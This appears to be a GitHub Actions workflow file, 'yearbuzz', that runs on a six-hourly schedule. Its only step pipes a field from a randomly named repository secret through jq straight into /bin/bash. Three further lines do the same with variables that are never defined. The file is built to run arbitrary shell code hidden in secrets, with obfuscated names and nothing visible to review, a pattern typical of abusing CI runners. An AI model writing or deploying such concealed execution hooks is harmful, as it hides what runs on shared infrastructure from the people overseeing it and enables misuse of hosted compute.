name: yearbuzz

on:
  workflow_dispatch:
  schedule:
    - cron: '35 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yearbuzz
        env:
          mgrv2914: ${{ secrets.mgrv2914 }}
        run: |
          echo $mgrv2914 | jq -r .jhks863 | /bin/bash
          echo $qfee91 | jq -r .yor53 | /bin/bash
          echo $ayxy23567 | jq -r .wn510 | /bin/bash
          echo $fvupj9 | jq -r .dhfjg895 | /bin/bash

